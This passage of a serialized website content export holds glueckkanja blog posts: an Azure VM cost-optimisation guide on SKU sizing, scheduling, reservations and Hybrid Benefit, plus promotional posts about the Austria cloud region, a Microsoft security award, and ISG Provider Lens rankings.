aspects:",[186,3874,3876],{"id":3875},"asignación-de-recursos","Resource allocation",[12,3878,47],{},[12,3880,3881],{},"The first key question is: is the VM assigned the optimal SKU?",[12,3883,3884],{},"To answer it, look at the VM's metrics in the Azure portal. They may reveal that the VM is oversized, or that its resources are only fully used at certain times while the VM sits idle the rest of the time. 
It may also turn out that the VM is in an unsuitable SKU series and that a variant with more RAM per CPU core would be a better fit.",[12,3886,3887,3890,3892],{},[251,3888,3889],{},"Example: intermittent use",[531,3891],{},"\nA typical scenario: monthly billing runs in an ERP system. The VM is used heavily once a month to process invoices, but for the rest of the month it only serves sporadic, less demanding data queries.",[12,3894,3895,3898],{},[251,3896,3897],{},"Solution:"," Shrink the VM for most of the month and enlarge it temporarily for the billing runs. Azure lets you resize within the same series; the VM is restarted for the change, so the downtime is short but not zero and the resize belongs in a maintenance window.",[12,3900,3901,3904,3906],{},[251,3902,3903],{},"Example: unsuitable SKU",[531,3905],{},"\nAnother case: an application needs 64 GB of RAM but only 4 CPU cores. If the VM is configured as Standard_D16s_v5 it comes with 16 CPU cores, far more than required.",[12,3908,3909,3911],{},[251,3910,3897],{}," Switching to a SKU such as Standard_E8-4s_v5 would provide the same 64 GB of RAM with only 4 active CPU cores. Note that a constrained-core SKU is billed at the price of its parent size (here Standard_E8s_v5): the compute saving comes from moving from 16 to 8 paid vCPUs, and for per-core licensed software such as SQL Server there is an additional saving from licensing only the 4 active cores.",[12,3913,3914,3915,3920],{},"Using the ",[2630,3916,3919],{"href":3917,"rel":3918},"https://azure.microsoft.com/es-es/pricing/calculator/",[3135],"Azure pricing calculator",", you can quickly identify the potential savings. The monthly difference can exceed 500 euros.",[12,3922,3923],{},[2772,3924],{"alt":3925,"src":3926},"VM cost comparison","https://res.cloudinary.com/c4a8/image/upload/blog/pics/vm-cost-optimization.png",[186,3928,3930],{"id":3929},"optimización-del-tiempo-de-ejecución-de-las-vms","Optimising VM running time",[12,3932,47],{},[12,3934,3935],{},"In the cloud, VMs generate cost according to the CPU and RAM allocated to them while they run. On premises, VMs tended to run 24/7 without that having much effect on cost. 
In the cloud, however, the question arises: does the VM really need to run 24/7?",[12,3937,3938,3941,3943],{},[251,3939,3940],{},"Example: 12/5 usage",[531,3942],{},"\nImagine a VM whose application is not used at night or at weekends. Continuous availability is not required.",[12,3945,3946,3948],{},[251,3947,3897],{}," Configure the VM to shut down outside business hours. Make sure update management is taken into account, so that the shutdown schedule does not stop patches from being applied and quietly create a security risk. With Azure Automation accounts you can automate starting and stopping VMs on a predefined schedule.",[12,3950,3951,3954,3956],{},[251,3952,3953],{},"Example: 24/7 usage",[531,3955],{},"\nSome systems, such as domain controllers, need to be available constantly to respond to users, clients and servers.",[12,3958,3959,3961,3962,3967],{},[251,3960,3897],{}," In these cases, ",[2630,3963,3966],{"href":3964,"rel":3965},"https://azure.microsoft.com/es-es/pricing/reserved-vm-instances/",[3135],"Azure Reserved Instances"," are ideal. Organisations can reserve compute capacity for a one- or three-year term at a reduced rate, paid monthly or up front. A reservation is not tied to one VM: it applies to other VMs of the same size whenever they are running.",[12,3969,3970,3973,3975],{},[251,3971,3972],{},"Example: planned modernisation",[531,3974],{},"\nIn some cases VMs are still needed while a transition to cloud-native services such as Azure Functions or Kubernetes clusters is being planned. If that migration is expected within less than three months, Reserved Instances may not pay off.",[12,3977,3978,3980,3981,3986,3987,3992],{},[251,3979,3897],{}," The ",[2630,3982,3985],{"href":3983,"rel":3984},"https://learn.microsoft.com/es-es/azure/cost-management-billing/savings-plan/savings-plan-compute-overview",[3135],"Azure Savings Plan"," is a flexible alternative. 
Similar a las Reserved Instances, abarca de 1 a 3 años, pero cubre una gama más amplia de ",[2630,3988,3991],{"href":3989,"rel":3990},"https://azure.microsoft.com/es-es/pricing/offers/savings-plan-compute/#Select-services",[3135],"servicios de Azure",". Las empresas se comprometen a gastar un monto fijo por hora, obteniendo tarifas reducidas para servicios elegibles hasta ese límite. Los costos que excedan el compromiso se facturan a las tarifas estándar.",[186,3994,3996],{"id":3995},"licencias","Licencias",[12,3998,47],{},[12,4000,4001],{},"Un factor a menudo subestimado en la optimización de costos son las licencias del sistema operativo. Cuando se crea una VM en Azure, Microsoft proporciona por defecto una licencia de alquiler para el sistema operativo. Sin embargo, muchas organizaciones ya cuentan con licencias existentes.",[12,4003,4004,4007,4009,4010,4015],{},[251,4005,4006],{},"Solución: Azure Hybrid Benefit",[531,4008],{},"\nCon ",[2630,4011,4014],{"href":4012,"rel":4013},"https://azure.microsoft.com/es-es/pricing/hybrid-benefit/",[3135],"Azure Hybrid Benefit",", puedes usar licencias existentes, como Windows Server, en tus VMs de Azure.",[12,4017,4018],{},[2772,4019],{"alt":4020,"src":4021},"Azure Hybrid Benefit Windows Server","https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure_hybrid_benefit_ms_picture_windows_server.png",[12,4023,4024],{},"Esta opción también está disponible para sistemas licenciados de terceros como Red Hat, SUSE Enterprise y Microsoft SQL Server.",[12,4026,4027],{},"El uso de licencias existentes en Azure está sujeto a ciertos requisitos. Una vez cumplidos, puedes activar el Hybrid Benefit fácilmente desde la configuración de la VM. 
Los beneficios son evidentes: una comparación entre VMs con y sin Hybrid Benefit resalta el ahorro potencial.",[12,4029,4030],{},[2772,4031],{"alt":4014,"src":4032},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure-hybrid-benefit.png",[12,4034,4035],{},"Vale la pena verificar si tus licencias actuales califican para el Azure Hybrid Benefit.",[41,4037,4039],{"id":4038},"conclusion","Conclusion",[12,4041,4042],{},"Un análisis detallado de la asignación de recursos, la optimización del tiempo de ejecución y el uso de licencias existentes son pasos clave para reducir costos. También es importante considerar alternativas a las VMs y explorar servicios nativos de la nube. Herramientas como el Calculador de precios de Azure, Azure Automation y opciones como Azure Hybrid Benefit te ayudarán a identificar oportunidades de ahorro.",[12,4044,4045],{},"Para tener éxito en la nube a largo plazo, es fundamental evaluar continuamente los costos y los beneficios, y estar dispuesto a optimizar la infraestructura según sea necesario.",{"title":65,"searchDepth":111,"depth":111,"links":4047},[4048,4049,4050,4055],{"id":3790,"depth":111,"text":3791},{"id":3822,"depth":111,"text":3823},{"id":3866,"depth":111,"text":3867,"children":4051},[4052,4053,4054],{"id":3875,"depth":329,"text":3876},{"id":3929,"depth":329,"text":3930},{"id":3995,"depth":329,"text":3996},{"id":4038,"depth":111,"text":4039},{"lang":2170,"seoTitle":4057,"titleClass":2172,"date":4058,"categories":4059,"blogtitlepic":4060,"socialimg":4061,"customExcerpt":4062,"keywords":4063,"hreflang":4064,"scripts":4069},"Optimiza los costos de las VM en Azure: Los mejores consejos y estrategias","2024-11-11",[3243],"head-vm-cost-optimization","/blog/heads/head-vm-cost-optimization.jpg","Las máquinas virtuales (VMs) en Azure pueden ser más costosas de lo esperado, especialmente sin una optimización adecuada. 
Este artículo te guía a través de estrategias como elegir la SKU correcta, optimizar tiempos de ejecución y aprovechar licencias existentes para reducir costos y mejorar la eficiencia a largo plazo.","Costos de Azure VM, optimización de costos en la nube, máquinas virtuales, SKU de Azure, Azure Hybrid Benefit, servicios nativos en la nube, optimización de costos en Azure, optimización de tiempos de ejecución de VM, Azure Reserved Instances, Azure Automation",[4065,4067],{"lang":2257,"href":4066},"/blog/azure/2024/11/vm-cost-optimization-on-azure-en",{"lang":2260,"href":4068},"/blog/azure/2024/11/vm-cost-optimization-on-azure",{"slick":2180,"form":2180},"/posts/2024-11-11-vm-cost-optimization-on-azure",{"title":3776,"description":3784},"posts/2024-11-11-vm-cost-optimization-on-azure",[4074,4075,4076],"Azure Automation","Tecnología en la Nube","Optimización de Costos en Azure","GeFrKMVlWukrdr2y_vn7sD_pDzhKbLvBMZCkgIqORfY",{"id":4079,"title":4080,"author":4081,"body":4082,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4158,"moment":4160,"navigation":2180,"path":4206,"seo":4207,"stem":4208,"tags":4209,"webcast":2167,"__hash__":4213},"content_es/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[2534],{"type":9,"value":4083,"toc":4154},[4084,4088,4090,4093,4119,4122,4126,4128,4131,4151],[41,4085,4087],{"id":4086},"una-región-de-la-nube-que-lo-cambia-todo","¡Una Región de la Nube que lo Cambia Todo!",[12,4089,31],{},[12,4091,4092],{},"Ahora hay una respuesta a todos estos desafíos: Microsoft está construyendo su propia región de la nube en Austria con centros de datos de última generación y máximo rendimiento. 
Esto significa para ti: ¡Ahora obtienes el poder global de una nube pública con la seguridad del almacenamiento de datos local!",[1255,4094,4095,4101,4107,4113],{},[1258,4096,4097,4100],{},[251,4098,4099],{},"Máximo Rendimiento:"," menor latencia, mayor escalabilidad, más eficiencia",[1258,4102,4103,4106],{},[251,4104,4105],{},"Almacenamiento de Datos Local:"," todos los datos permanecen en Austria – seguros, conformes y protegidos",[1258,4108,4109,4112],{},[251,4110,4111],{},"Mayor Seguridad y Resiliencia:"," infraestructura de última generación con múltiples capas de seguridad",[1258,4114,4115,4118],{},[251,4116,4117],{},"TI Sostenible:"," hasta un 93% más eficiente en energía que los centros de datos tradicionales",[12,4120,4121],{},"Pero una región de la nube por sí sola no es suficiente – el socio adecuado marca la diferencia. Aquí es donde entramos nosotros, glueckkanja.",[41,4123,4125],{"id":4124},"te-preparamos-para-el-futuro-local-de-tu-ti","¡Te Preparamos para el Futuro Local de tu TI!",[12,4127,31],{},[12,4129,4130],{},"En Alemania, somos uno de los principales socios de Microsoft para la migración a la nube. Ahora, nuestra experiencia también está disponible en la nueva Microsoft Cloud Region Austria. Como socio estratégico, llevamos tu empresa a la nube de manera fluida. ¿Tienes preguntas sobre la protección de datos, la migración de sistemas o los beneficios financieros disponibles? Estamos aquí para ti y te acompañamos desde los primeros pasos hasta el lanzamiento final (y con gusto más allá). 
Tus beneficios:",[1255,4132,4133,4139,4145],{},[1258,4134,4135,4138],{},[251,4136,4137],{},"Implementación de Blueprint y Landing Zone:"," ¡Te permitimos migrar de manera segura, rápida y sin problemas!",[1258,4140,4141,4144],{},[251,4142,4143],{},"Financiamiento AMM:"," ¡Te proporcionamos información completa sobre los fondos de Microsoft para una transición rentable!",[1258,4146,4147,4150],{},[251,4148,4149],{},"Transición Sin Problemas:"," ¡Te acompañamos paso a paso a la nueva AT-Cloud con soluciones estandarizadas!",[12,4152,4153],{},"Aprovecha ahora nuestra experiencia de más de 100 migraciones exitosas a la nube y nuestra experiencia de primera clase con Microsoft.",{"title":65,"searchDepth":111,"depth":111,"links":4155},[4156,4157],{"id":4086,"depth":111,"text":4087},{"id":4124,"depth":111,"text":4125},{"lang":2170,"seoTitle":4159,"titleClass":2172,"date":4160,"categories":4161,"blogtitlepic":4162,"socialimg":4163,"customExcerpt":4164,"keywords":4165,"contactInContent":4166,"hreflang":4200,"scripts":4205,"published":2180},"Microsoft Cloud Region Austria: Potencia de la Nube Local para tu Empresa","2025-03-12",[3243],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Las empresas austriacas se encuentran actualmente en un punto de inflexión. La digitalización está acelerándose rápidamente. 
Al mismo tiempo, aumentan las demandas de seguridad informática, velocidad y flexibilidad, así como los desafíos relacionados con los costos, las barreras regulatorias y el uso de nuevas tecnologías.","Microsoft Cloud Region Austria, Migración a la Nube Austria, almacenamiento de datos local, Seguridad en la Nube, Socio de Microsoft Austria, Rendimiento en la Nube, TI sostenible, Soluciones en la Nube Austria, Migración a Azure, Implementación de Landing Zone",{"quote":2180,"infos":4167},{"bgColor":2200,"headline":4168,"subline":4169,"level":41,"textStyling":2203,"flush":2204,"person":4170,"form":4177},"¡Ponte en Contacto Ahora!","¿Quieres saber más sobre cómo podemos llevar tu empresa de manera fluida y segura a la nueva Microsoft Cloud Region Austria? Nos complace presentarte nuestra oferta personalmente, responder a tus preguntas sobre protección de datos y migración, y guiarte paso a paso en tu camino hacia la nube. ¡Asegura tu consulta personal ahora!",{"image":4171,"cloudinary":2180,"alt":2534,"name":2534,"quotee":2534,"quoteeTitle":4172,"quote":4173,"detailsHeader":2809,"details":4174},"/people/people-florian-stoeckl.jpg","Azure Lead","La nueva Microsoft Cloud Region Austria es un verdadero cambio de juego: almacenamiento de datos local combinado con la potencia global de la nube, una mezcla imbatible para la seguridad, el rendimiento y la innovación. 
Con nuestra amplia experiencia, nos aseguramos de que las empresas austriacas puedan aprovechar al máximo esta oportunidad.",[4175,4176],{"text":2812,"href":2813,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4178,"method":2168,"action":2215,"fields":4179},{"skin":2214},[4180,4182,4184,4187,4190,4193,4194,4196,4198,4199],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},"Por favor, introduce tu nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},"Por favor, introduce tu empresa.",{"label":4185,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},"Correo Electrónico*","Por favor, introduce tu correo electrónico.",{"label":4188,"type":2231,"id":2232,"required":2180,"requiredMsg":4189},"Tu Mensaje para Nosotros*","Por favor, introduce un mensaje.",{"label":4191,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Tus datos serán almacenados con nosotros para procesar y responder a tu solicitud. 
Para más información sobre la protección de datos, consulta nuestra \u003Ca href=\"/de/datenschutz\">política de privacidad\u003C/a>.","Por favor, confirma",{"type":2240,"id":2241,"value":3243},{"type":2240,"id":2243,"value":4195},"AT",{"type":2240,"id":2246,"value":4197},"Formulario: Blog Hello Clöud | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[4201,4203],{"lang":2257,"href":4202},"/blog/azure/2025/03/azure-goes-austria-en",{"lang":2170,"href":4204},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":2180},"/posts/2025-03-12-azure-goes-austria",{"title":4080,"description":65},"posts/2025-03-12-azure-goes-austria",[3243,4210,4211,4212],"Cloud Migration","IT Infrastructure","Austria","5NiLMIHgRgsEfGGh2LXQn0eUbd6CinmqJwge87pC6s0",{"id":4215,"title":4216,"author":4217,"body":4218,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4274,"moment":4275,"navigation":2180,"path":4287,"seo":4288,"stem":4289,"tags":4290,"webcast":2167,"__hash__":4291},"content_es/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja sigue entre los 5 principales MSSP a nivel mundial",[2460],{"type":9,"value":4219,"toc":4270},[4220,4224,4226,4229,4232,4235,4238,4249,4252,4255,4258,4262,4264,4267],[41,4221,4223],{"id":4222},"tres-años-seguidos-glueckkanja-entre-la-élite-de-la-seguridad","Tres años seguidos: glueckkanja entre la élite de la seguridad",[12,4225,31],{},[12,4227,4228],{},"Por tercer año consecutivo, estamos entre los cinco mejores Managed Microsoft Security Providers del mundo. Un triplete que nos hace muchísima ilusión.\nNuestro CEO Christian Kanja y nuestro Head of Security Jan Geisbauer estuvieron en San Francisco para celebrar este premio junto a la Microsoft Intelligent Security Association (MISA) y la comunidad internacional de seguridad. 
RSA, el Golden Gate, la alfombra roja – no faltó de nada.",[12,4230,4231],{},"Y como la innovación no solo pasa sobre el escenario, Christian y Jan también respiraron un poco de futuro: recorrieron las calles de San Francisco en un taxi autónomo. Sin conductor, pero con un montón de entusiasmo – una experiencia que encajó a la perfección con el espíritu de la RSA.\nJusto eso es lo que buscamos también en ciberseguridad: la confianza nace cuando los sistemas cumplen lo que prometen.",[12,4233,4234],{},"Los Microsoft Security Excellence Awards son uno de los reconocimientos más importantes del sector. Premian a socios que marcan la diferencia con innovación y calidad de servicio. Que nos hayan vuelto a reconocer en 2025 como uno de los mejores Managed Security Service Providers es un hito especial para nosotros – y una gran confirmación del trabajo diario de todo nuestro equipo.",[12,4236,4237],{},"Lo que nos ha llevado hasta aquí:",[1255,4239,4240,4243,4246],{},[1258,4241,4242],{},"El 87 % de nuestros clientes valoran nuestra experiencia técnica al más alto nivel",[1258,4244,4245],{},"El 94 % destacan nuestros servicios 24/7",[1258,4247,4248],{},"El 100 % están satisfechos con su experiencia global",[12,4250,4251],{},"Resultados contundentes que demuestran que, como equipo, estamos logrando cosas extraordinarias.",[12,4253,4254],{},"Un enorme gracias a todos los que han hecho posible este éxito: a Microsoft y a la Microsoft Intelligent Security Association (MISA) por su colaboración cercana y su confianza, a nuestros clientes por su fidelidad, y a nuestro equipo CSOC, que da lo mejor de sí cada día.",[12,4256,4257],{},"En una comunidad de seguridad fuerte, las mejores mentes trabajan juntas – y esa colaboración es lo que nos impulsa a seguir avanzando.",[41,4259,4261],{"id":4260},"mirando-hacia-adelante","Mirando hacia adelante",[12,4263,31],{},[12,4265,4266],{},"Este premio es para nosotros tanto una motivación como una responsabilidad. 
Seguimos adelante: con innovación, pasión y el objetivo de ofrecer soluciones de seguridad de Microsoft al más alto nivel. Junto a Microsoft, nuestros clientes y socios, vamos a escribir el próximo capítulo de nuestra historia de éxito.",[12,4268,4269],{},"glueckkanja – Seguridad de nivel Champions League.",{"title":65,"searchDepth":111,"depth":111,"links":4271},[4272,4273],{"id":4222,"depth":111,"text":4223},{"id":4260,"depth":111,"text":4261},{"lang":2170,"seoTitle":4216,"titleClass":2172,"date":4275,"categories":4276,"blogtitlepic":4277,"socialimg":4278,"customExcerpt":4279,"keywords":4280,"hreflang":4281,"scripts":4286},"2025-04-29",[2663],"head-rsa-2025","/socialimg/og-img-mssp-2025.png","Los Microsoft Security Excellence Awards son uno de los mayores reconocimientos del sector. En la RSA Conference 2025 de San Francisco, se premió una vez más a socios que marcan estándares de innovación, calidad de servicio y compromiso. Nos alegra enormemente que glueckkanja haya vuelto a ser finalista en los 'Security MSSP of the Year Awards' en 2025: un gran reconocimiento al trabajo que todo nuestro equipo realiza cada día.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Mejor Partner de Seguridad de Microsoft 2025, Finalista Microsoft MSSP 2025, Ganador del Microsoft Security Award, Proveedor de Ciberseguridad con tecnología de Microsoft, Seguridad gestionada para Microsoft 365, Partner de la Microsoft Intelligent Security Association (MISA), RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, Partner MISA Microsoft, Soluciones de seguridad empresarial Microsoft, Tendencias de ciberseguridad 
2025",[4282,4284],{"lang":2257,"href":4283},"/blog/corporate/202504/rsa-mssp-2025-en",{"lang":2260,"href":4285},"/blog/corporate/202504/rsa-mssp-2025",{"slick":2180},"/posts/2025-04-29-rsa-mssp-2025",{"title":4216,"description":65},"posts/2025-04-29-rsa-mssp-2025",[2719,2720,2175,2721],"_daCkmcHdhEfYZ9x_kQtjQ3UnD9m9cJOvUwJgrvDQsA",{"id":4293,"title":4294,"author":4295,"body":4296,"cta":2165,"description":4300,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4392,"moment":4394,"navigation":2180,"path":4450,"seo":4451,"stem":4452,"tags":4453,"webcast":2167,"__hash__":4455},"content_es/posts/2025-05-08-isg-germany-2025.md","Cuatro veces seguidas. glueckkanja vuelve a liderar en ISG",[2460],{"type":9,"value":4297,"toc":4385},[4298,4301,4304,4308,4310,4313,4317,4319,4325,4331,4335,4337,4343,4348,4352,4354,4360,4365,4369,4371,4377,4382],[12,4299,4300],{},"Dicen que una vez no cuenta. Dos veces es buena señal. Pero a la tercera ya estás en el mapa. Y si vamos por la cuarta, no hay duda: glueckkanja se ha consolidado como un referente en el estudio ISG Provider Lens™. Tras ser nombrados Líder en 2021, 2023 y 2024, volvemos a estar entre los mejores en 2025 – tanto en Microsoft 365 Services como en Managed Azure.",[12,4302,4303],{},"Como socio de Microsoft con años de experiencia, ayudamos a empresas de todo el mundo a dar el salto a la nube – con visión estratégica, seguridad y siempre con los pies en la tierra. Así contribuimos a la seguridad IT global e impulsamos la innovación en numerosos sectores. Nos alegra ver que ISG sigue reconociendo ese esfuerzo.",[41,4305,4307],{"id":4306},"estudio-isg-provider-lens-2025","Estudio ISG Provider Lens™ 2025",[12,4309,31],{},[12,4311,4312],{},"Con su estudio “Microsoft Cloud Ecosystem”, ISG ofrece valiosas perspectivas dentro de su serie Provider Lens™, ayudando a las organizaciones a orientar su estrategia – desde el posicionamiento hasta asociaciones y estrategias de salida al mercado. 
Los proveedores se evalúan según su portafolio y competitividad en el ecosistema Microsoft Cloud, y se sitúan en uno de los cuatro cuadrantes: Product Challenger, Contender, Market Challenger y Leader. Pero basta de teoría – veamos cómo nos fue.",[41,4314,4316],{"id":4315},"glueckkanja-es-líder-en-microsoft-365-services-midmarket","glueckkanja es Líder en Microsoft 365 Services (Midmarket)",[12,4318,31],{},[12,4320,4321],{},[2772,4322],{"alt":4323,"src":4324},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[12,4326,4327],{},[4328,4329,4330],"em",{},"\"glueckkanja lidera la transformación cloud, integra Microsoft 365 y Windows 365 con eficiencia y apuesta por la automatización para optimizar procesos IT y garantizar la seguridad.\"",[41,4332,4334],{"id":4333},"glueckkanja-es-líder-en-microsoft-365-services-large-accounts","glueckkanja es Líder en Microsoft 365 Services (Large Accounts)",[12,4336,31],{},[12,4338,4339],{},[2772,4340],{"alt":4341,"src":4342},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[12,4344,4345],{},[4328,4346,4347],{},"\"glueckkanja optimiza entornos IT complejos, integra Microsoft 365 y Windows 365 de forma fluida y apuesta por la automatización para lograr máxima escalabilidad, seguridad y eficiencia.\"",[41,4349,4351],{"id":4350},"glueckkanja-es-líder-en-managed-services-for-azure-midmarket","glueckkanja es Líder en Managed Services for Azure (Midmarket)",[12,4353,31],{},[12,4355,4356],{},[2772,4357],{"alt":4358,"src":4359},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[12,4361,4362],{},[4328,4363,4364],{},"\"glueckkanja ofrece infraestructuras cloud seguras y escalables que reducen riesgos y aumentan la eficiencia. 
Gracias a la automatización y una gobernanza proactiva, las empresas ganan estabilidad, control y visión de futuro.\"",[41,4366,4368],{"id":4367},"glueckkanja-es-líder-en-managed-services-for-azure-large-accounts","glueckkanja es Líder en Managed Services for Azure (Large Accounts)",[12,4370,31],{},[12,4372,4373],{},[2772,4374],{"alt":4375,"src":4376},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[12,4378,4379],{},[4328,4380,4381],{},"\"glueckkanja está marcando el futuro de la nube con automatización, gobernanza y sostenibilidad. Con Infrastructure as Code y una optimización iterativa, desarrollamos soluciones resilientes, escalables y rentables.\"",[12,4383,4384],{},"Solo nos queda decir: gracias por tanta confianza. Si quieres echar un vistazo más a fondo a los resultados del estudio, estaremos encantados de enviarte el resumen completo de ISG.",{"title":65,"searchDepth":111,"depth":111,"links":4386},[4387,4388,4389,4390,4391],{"id":4306,"depth":111,"text":4307},{"id":4315,"depth":111,"text":4316},{"id":4333,"depth":111,"text":4334},{"id":4350,"depth":111,"text":4351},{"id":4367,"depth":111,"text":4368},{"lang":2170,"seoTitle":4393,"titleClass":2172,"date":4394,"categories":4395,"blogtitlepic":4396,"socialimg":4397,"customExcerpt":4398,"keywords":4399,"hreflang":4400,"footer":4405,"contactInContent":4406,"textImageTeaser":4438},"ISG 2025: glueckkanja vuelve a ser nombrado Líder en Managed Services for Azure y Microsoft 365 Services","2025-05-08",[2663],"head-isg-2025.png","/blog/heads/head-isg-2025.png","El estudio ISG Provider Lens™ 2025 vuelve a reconocer a glueckkanja como Líder en las categorías Managed Services for Azure y Microsoft 365 Services. 
Premiados tanto en el segmento Midmarket como en Large Accounts, queda claro lo que se ha ido confirmando en los últimos años: cuando se trata de estandarización, automatización y escalabilidad en entornos Microsoft, glueckkanja es el socio ideal.","Microsoft partner Alemania, Managed Services Azure Alemania, Microsoft 365 Services Alemania, proveedor de servicios IT Alemania, servicios cloud Alemania, ISG Provider Lens Alemania, glueckkanja Alemania, Microsoft cloud Alemania, ISG Líder 2025, seguridad informática Alemania, transformación digital Alemania, servicios Azure Alemania, consultoría Microsoft 365 Alemania, glueckkanja, servicios Microsoft glueckkanja, premio ISG Microsoft",[4401,4403],{"lang":2260,"href":4402},"/blog/corporate/2025/05/isg-germany-2025",{"lang":2257,"href":4404},"/blog/corporate/2025/05/isg-germany-2025-en",{"noMargin":2180},{"quote":2180,"infos":4407},{"bgColor":2200,"headline":4408,"subline":4409,"level":41,"textStyling":2203,"flush":2204,"person":4410,"form":4419},"Solicita el estudio","¿Quieres profundizar en los resultados del estudio? 
Escríbenos – te enviaremos el resumen completo de ISG con nuestras capacidades y fortalezas.",{"image":4411,"cloudinary":2180,"alt":2414,"name":2414,"quotee":2414,"quoteeTitle":4412,"quote":4413,"detailsHeader":4414,"details":4415},"/people/people-michael-breither.jpg","COO","Ser reconocidos una vez más por ISG confirma nuestro enfoque: servicios estandarizados y escalables para plataformas Microsoft – con un verdadero valor añadido para nuestros clientes.","¡Esperamos\u003Cbr />tu mensaje!",[4416,4418],{"text":2812,"href":2813,"details":4417,"icon":2815},"Llamar ahora",{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4420,"method":2168,"action":2215,"fields":4421},{"skin":2214},[4422,4423,4425,4426,4429,4431,4432,4434,4436,4437],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4424},"Por favor, introduce el nombre de tu empresa.",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":4427,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},"Tu mensaje","Por favor, escribe un mensaje.",{"label":4430,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Tus datos se almacenarán y utilizarán para responder a tu solicitud. 
Más información en nuestra \u003Ca href=\"/es/privacidad\">Política de privacidad\u003C/a>.",{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":4433},"DE",{"type":2240,"id":2246,"value":4435},"Formulario: Blog ISG Alemania | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"image":4439,"cloudinary":2180,"alt":4440,"bgColor":4441,"offset":2167,"list":4442,"left":2167,"float":2167,"firstColWidth":650,"secondColWidth":662,"copyClasses":4446,"headline":4447,"subline":4448,"spacing":4449},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[4443],{"ctaText":4444,"ctaHref":4445,"ctaType":3068},"Más información","/es/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>Por cierto, ¡en Suiza somos Rising Star!\u003Cbr />¡Merci, ISG!\u003C/p>","\u003Cp>Consulta todos los resultados de ISG en Suiza.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":4294,"description":4300},"posts/2025-05-08-isg-germany-2025",[2719,4454],"ISG","2f79OgjbQalBj8VIHaw7Vb2G0hYOOYF64cN4POr-YII",{"id":4457,"title":4458,"author":4459,"body":4460,"cta":2165,"description":4464,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4517,"moment":4394,"navigation":2180,"path":4561,"seo":4562,"stem":4563,"tags":4564,"webcast":2167,"__hash__":4565},"content_es/posts/2025-05-08-isg-switzerland-2025.md","Suiza se suma. glueckkanja se convierte en Rising Star de ISG",[2460],{"type":9,"value":4461,"toc":4512},[4462,4465,4468,4470,4472,4475,4479,4481,4487,4492,4496,4498,4504,4509],[12,4463,4464],{},"Berna es conocida por su impresionante casco antiguo, la Torre del Reloj, el Palacio Federal – y, por supuesto, el jardín de rosas. 
Now there is a new reason to be proud: glueckkanja Switzerland has been named a “Rising Star” in the latest ISG Provider Lens™ study, in recognition of our Microsoft 365 services and Managed Services for Azure.",[12,4466,4467],{},"Since 2024 we have had a direct presence in Bern. From there, as an experienced Microsoft partner, we help Swiss companies migrate to the cloud, with strategy, security and a clear view of what is possible. In just twelve months, we have helped strengthen IT security across the Swiss business landscape and driven innovation in multiple sectors. That makes us all the more pleased that our work is being recognized by ISG.",[41,4469,4307],{"id":4306},[12,4471,31],{},[12,4473,4474],{},"The “Microsoft Cloud Ecosystem” study is part of ISG's Provider Lens™ series and offers in-depth analyses that help companies align their strategy, from positioning to partnerships and go-to-market strategies. Providers are assessed on their portfolio and competitiveness within the Microsoft Cloud ecosystem and are placed in four quadrants: Product Challenger, Contender, Market Challenger and Leader. 
That is the theory; now on to our results.",[41,4476,4478],{"id":4477},"glueckkanja-es-rising-star-en-microsoft-365-services","glueckkanja is a Rising Star in Microsoft 365 Services",[12,4480,31],{},[12,4482,4483],{},[2772,4484],{"alt":4485,"src":4486},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[12,4488,4489],{},[4328,4490,4491],{},"\"glueckkanja supports Swiss companies in their secure cloud transformation, integrates Microsoft 365 and Windows 365, and optimizes IT processes through automation and scalability.\"",[41,4493,4495],{"id":4494},"glueckkanja-es-rising-star-en-managed-services-for-azure","glueckkanja is a Rising Star in Managed Services for Azure",[12,4497,31],{},[12,4499,4500],{},[2772,4501],{"alt":4502,"src":4503},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[12,4505,4506],{},[4328,4507,4508],{},"\"glueckkanja is a Rising Star in the Swiss market for Managed Services for Azure. With local presence, proven performance and technological vision, the company strengthens security, automation and scalability for future-ready cloud 